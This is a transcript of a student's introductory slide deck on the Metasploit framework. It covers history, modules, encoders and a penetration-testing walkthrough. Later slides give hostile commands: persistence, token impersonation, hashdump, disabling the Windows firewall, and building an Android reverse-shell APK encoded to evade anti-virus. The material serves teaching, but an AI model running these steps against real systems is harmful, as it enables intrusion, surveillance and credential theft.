metasploit
TRANSCRIPT
INTRODUCTION TO METASPLOIT
#METASPLOIT
G.Manideep,
@mani0x00
-God of Framework’s
#whoami<?php$var = “@mani0x00”;If ($var == script kiddie){Echo ‘security flows in blood ’;}Else if ($var == white hat){Echo ‘security flows in blood’;}Else{Echo ‘security flows in blood’;}?>
G.Manideep,
B.tech 3rd year ,E.C.E
@mani0x00
#Creator
Developer of Metasploit Framework.
Chief Researcher at Boston.
Leading provider of security data
and analytics software and cloud
Solutions.
#History In Oct 2003 ‘DEFCON’ Metasploit 1.0 was released with 11 exploits
by H.D.Moore.
Firstly, it was completely coded in Perl and later completely re-coded in Ruby.
Acquired by Rapid7 in 2009 under some terms and conditions.
Remains open source
#Getting started#vulnerability
A Vulnerability is a weakness of a system, which allows the attacker to Exploit the system.
VULNERABILITY
#Getting started#Exploit An Exploit is an attack on a system, especially one that takes advantage of a particular Vulnerability of the system using Payloads.
#Getting started#PayloadA Payload is a piece of code that executes in the vulnerable system after exploitation of the system.
Tools
Libraries
REX
MSF core
MSF basePlugins
Modules
Auxiliary Payloads Exploits Encoders Nops
#Architecture Interfaces
Console
CLI
WEB
Armitage
#libraries
rex
msf:: core
msf :: base
#ModulesExploit’s
Payload’s
Auxiliary’s
Encoders
Nops
#Auxiliary’sTypically, an Exploit without Payload is called Auxiliary.
Used for scanning, fuzzing, and some automated tasks.
Makes use of mixins.
To run type in Run.
#EncodersTo evade anti-viruses encoders are used.
Payload’s are encrypted.
E.g.
• Shikata_ga_nai
• Nonaplha
• Bloxor
#NopsMainly used to keep the size of the payload consistent.
Having 8 nops.
#Interfaces
#msfcli
#msfconsole
#msfweb
#Armitage(GUI)
#Armitage (Gui)Developed by Raphel
Mudge
#msfconsoleWhich is a interactive console.
starting msfconsole
#msfconsoleHere our journey begins
msf >
#let’s attack
#Port scanning
which is for information gathering.
Nmap is used for port scanning.
Auxiliary’s also can be used.
As information gathering is important in pen testing, let’s do
a traditional scanning .
#Port scanningUsing Auxiliary’s:
#Port scanningUsing Nmap:
#Exploitation
Mostly an attacker send’s a combination of Exploit and Payload.
In msfconsole there are some simple commands that makes our
work pretty easy
some of them are (core commands):
Search Use Set
Run Exploit Setg
#ExploitationUsing Exploit:
Just type in use <path of suggested exploit’s>
prefer the exploit which has a good ranking.
#ExploitationSetting Parameters:
Just type show options and find the parameters to be filled.
Then set the parameter by typing ‘set <parameter> <value>’.
#ExploitationSimilar to Exploit’s search, search for appropriate Payload.
Then Set using ‘set PAYLOAD’ and fill the payload parameters.
Then Just type in “Exploit”.
#some successful exploitsms03_026dcom
ms08_067_netapi (ever green :D )
ms11_050_mshtml
ms10_042_helpctr_xss_cmd_exec
ms10_046_shortcut_icon_dllloader
dreamftp_format
distcc_exec (for linux)
#Maintaining accessBy executing a script with some arguments as shown below-run persistence –S(admin priv) –i(time int) –p(rport) –r(lhost)
#Maintaining accessBy listening on the specified port using multi-handler exploit
#Post ExploitationUsing this meterpreter we can perform different tasks by getting
the privileges of the victim .
Can grab a screen shot’s, keylogging by loading and much more with
• Espia
• Incognito
• Pivot
• Sniffer
• Priv
• Stdapi (By Default)
#Post ExploitationCan also perform using modules.
Let’s take multiple screen shots in a certain intervals.
#Post ExploitationMargate's to another process which has admin privileges
and then completes the task.
#Post ExploitationWhat else we can do in post exploitation?
Let’s see some of them,
-Keylogging
-Screen shots
-view live screen
-access webcam
-take control of keyboard and mouse
-del user
-pivort
-vm detection and many more..
#Privilege Escalation
what can you get from the system privileges which are used to
be protected is called Privilege escalation.
Some of them are migrating the process, stealing the tokens to get
the desired privileges.
Let’s take a look on some of them .
#Privilege EscalationCan migrate to pid’s which has admin privileges.
#Privilege Escalation By loading Incognito, We can steal( impersonate ) the tokens
to get privileges.
#Privilege Escalation To use type in impersonate_token<token>
#Privilege Escalation
#HashDump:
Dumps all the user’s usernames and passwords
#What else we can do? Even can sniff the packets of the victim remotely
Evading Firewall’s
Let’s take a look
#Bypassing Firewall
#Bypassing FirewallAfter getting a meterpreter , get access to shell and type
> netsh firewall show opmode
#Bypassing FirewallNow type >netsh firewall set opmode mode= DISABLE
#Attacking LinuxUsing distcc_exec
#Attacking AndroidUsing msfpayloadmsfpayload android/meterpreter/reverse_tcp
LHOST=<loc-ip>
LPORT=<any> R> /(desired path for saving)<file>.apk
Install that apk file into device
if there is any anti-virus encode them with encoders
#Attacking AndroidListen on mentioned port using multi-handler exploit
#Thank you!
-@mani0x00